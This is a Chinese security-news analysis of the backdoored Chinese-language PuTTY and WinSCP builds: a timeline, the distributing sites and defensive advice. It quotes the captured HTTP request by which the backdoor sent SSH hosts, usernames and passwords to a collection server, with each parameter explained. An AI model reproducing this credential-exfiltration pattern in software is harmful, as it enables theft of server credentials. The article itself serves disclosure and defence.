中文版putty后门事件分析

所属分类: 网络安全 / 业界动态 阅读数: 134
收藏 0 赞 0 分享
根据分析,此次事件涉及到来自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站点的中文版putty、 WinSCP、SSHSecure和psftp等软件,而这些软件的英文版本不受影响。

1.时间线

1月25日:新浪微博有网友发布消息称putty和winscp中装有后门程序,但该条微博并未提及后门程序的类型及其技术细节,而且消息也未被过多的人所重视,目前无法确定该条微博是否与此次事件有关联:

 

1月30日下午16点左右:互联网上再度出现关于中文版putty等SSH管理软件被装有后门的消息,并且此消息对后门的行为特征进行了简要的描述 —— 该程序会导致root密码丢失,但发布者仍未披露具体的技术细节:

 

以上微博的短URL所对应的文章截图如下:

 1月31日:经过一晚的酝酿,putty事件开始在互联网上广泛传播,微博、论坛等信息发布平台上开始大量出现putty后门事件的消息,同时,很多技术人员也开始对含有后门的putty等SSH管理软件进行技术分析,并陆续发布其中的技术细节。

2.事件分析

2.1问题软件源头

知道创宇安全研究团队在获取信息后,第一时间对putty等软件进行了跟踪分析。通过分析发现,来自以下几个站点的中文版putty、WinSCP、SSHSecure和psftp等软件都可能存在后门程序:
http://www.putty.org.cn
http://www.putty.ws
http://www.winscp.cc
http://www.sshsecure.com

2.2行为分析

2.2.1网络行为分析

使用带有后门程序的中文版putty等SSH管理软件连接服务器时,程序会自动记录登录时的用户名、密码和服务器IP地址等信息,并会以HTTP的方式将这些信息发送到指定的服务器上,以下是在分析过程中抓取到的原始HTTP数据:
GET /yj33/js2.asp?act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Host: l.ip-163.com:88
Pragma: no-cache

从以上数据可以获得以下信息:

  1. 敏感信息通过HTTP GET的方式发送到服务器l.ip-163.com上(经测试,该域名与putty.org.cn位于同一IP地址上)
  2. 用于收集密码的程序地址为http:// l.ip-163.com:88/yj33/js2.asp
  3. 敏感信息以GET参数的方式发送到服务器上,相关参数为:

act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY

每个字段的作用如下:

  •   act为执行的动作,参数add用于添加信息,经测试,也可使用del来删除信息
  •   user为SSH服务器的IP地址,此处为50.23.79.188
  •   pwd为连接服务器时的登录用户名,此处为abc
  •   ll1为登录密码,此处为pass
  •   ll2为目标服务器的SSH端口,此处为22(即,默认端口)
  •   ll3则为客户端类型,此处为PuTTY

2.2.2服务器本地文件分析

知道创宇安全研究团队借助文件完整性校验的方式,对服务器初始安全状态下的 /etc、/lib、/usr、/bin等敏感目录进行了完整性备份,并在putty连接测试后对这些目录的文件变更、丢失和添加等情况进行了校验,校验结果显示,中文版putty并未对服务器自动安装后门程序。

网络上部分消息称,有些使用中文版putty进行过远程管理的服务器上出现恶意代码和文件,可能是由于恶意用户获取了putty所收集的密码后人为植入所致。

2.3事件后续

截止至2月1日,在本次事件中所涉及的以下域名均已不能访问:

http://www.putty.org.cn

http://putty.ws

http://www.winscp.cc

http://www.sshsecure.com

http://l.ip-163.com:88

但是,在1月31日晚,网络上传出“l.ip-163.com被黑”的消息并配有一张“受害者列表”的截图:

 

而就在此消息发布不久之后,互联网上便出现了完整的受害者列表供所有用户浏览和下载,根据这份来自互联网列表的显示,不但有众多政府网站位列其中,IBM、Oracle、HP等大厂商的服务器也出现在列表内。

3.安全建议

若您使用过中文版的putty、WinSCP、SSHSecure和psftp等软件,但暂时又不能对服务器进行下线处理,可采取以下临时解决方案来处理:

  1. 使用chkrootkit或rootkit hunter对服务器进行扫描,检查是否存在已知后门
  2. 查看网络是否有可疑外联,并加强对可疑外联的监控
  3. 在网络层建立端口访问控制策略,阻止除正常业务外的一切非业务、非管理端口
  4. 更换SSH登录密码,建议登录时使用证书加密码的组合方式进行身份验证
  5. 登录SSH时,不要直接使用root用户,先使用普通用户登录后,再su至root
  6. 服务器端通过TCP Wrapper或iptables等软件,限制IP访问,仅允许特定IP地址对服务器的SSH进行连接和管理
  7. 如需使用putty、WinSCP等软件,可访问其官方站点下载:

http://www.putty.org/

http://winscp.net/eng/docs/lang:chs

更多精彩内容其他人还在看

Android安卓其实是Google下的一剂药

Android安卓对于Google到倒意味着什么呢.本文从另一个角度分析.
收藏 0 赞 0 分享

关于私有云(云计算))安全问题的讲解

注:本文中的观点仅代表个人意见,如有不妥之处还请海涵。今天我们来详细说说私有云的安全。
收藏 0 赞 0 分享

关于网址的HTTP头引发的我们关于安全问题的思考

本文主要介绍了HTTP头所引发的问题.我们来剖析一下.了解清楚
收藏 0 赞 0 分享

对于www.pei.net.ph仿冒入侵菲律宾网站的整体性分析

菲律宾事件最近闹的挺凶,在网上也不例外.菲律宾的一些网站也被黑了.怎么看呢.
收藏 0 赞 0 分享

Google AdSense允许修改西联汇款拼音姓名

GOOGLE允许修改拼音姓名了.对我们来说又是一大方便
收藏 0 赞 0 分享

黑客都是天才:网络中10种不同类型的黑客分析

黑客都不是一般的人.天才.我们看一下都有哪些类型
收藏 0 赞 0 分享

微软发布Fix it工具修复IE7/8/9漏洞 ie用户请尽快修复(0day漏洞)

日前有安全机构曝光了IE浏览器的一个0day漏洞,利用这个0day漏洞(CVE-2012-4681)攻击者可以绕过Windows的ASLR(地址空间布局随机化)防护机制,访问用户曾访问过的计算机上所有文件
收藏 0 赞 0 分享

未来互联网企业安全问题预测 网络安全是场硬仗

互联网的发展已经步入稳定期,未来不会像之前那样呈现爆发性增长的状况了,那么未来的网络谁是主角?是安全。云计算与大数据在为我们的生活工作带来方便的同时,也面临着从未有过的危机考验,企业更是如此,安全变得无比重要
收藏 0 赞 0 分享

安卓7.0解决部分勒索软件问题 安卓7.0包含正义代码

有一天打开电脑,发现电脑已经被锁住,窗口弹出说明:如果你不给钱,就把你的电脑清空,这就是遇到了勒索软件。近年来,这种勒索已经频频出现在安卓手机上,手机里的重要资料可能比电脑里还多,这时候怎么办,真的不得不给它钱?安卓7.0的发布,带来了正义的守护
收藏 0 赞 0 分享

乌云漏洞平台被连锅端?互联网安全缺失的到底是什么

还记得我们之前说过的有个白帽子提交了世纪佳缘的漏洞然后被世纪佳缘告了的事情吗?这件事情引起了国内很多白帽黑帽的关注,如今事情又发酵,中国最大的两大漏洞平台——乌云和漏洞盒子同时出现状况。我们想看到这方面的监管和立法能跟上时代,仅此而已
收藏 0 赞 0 分享
查看更多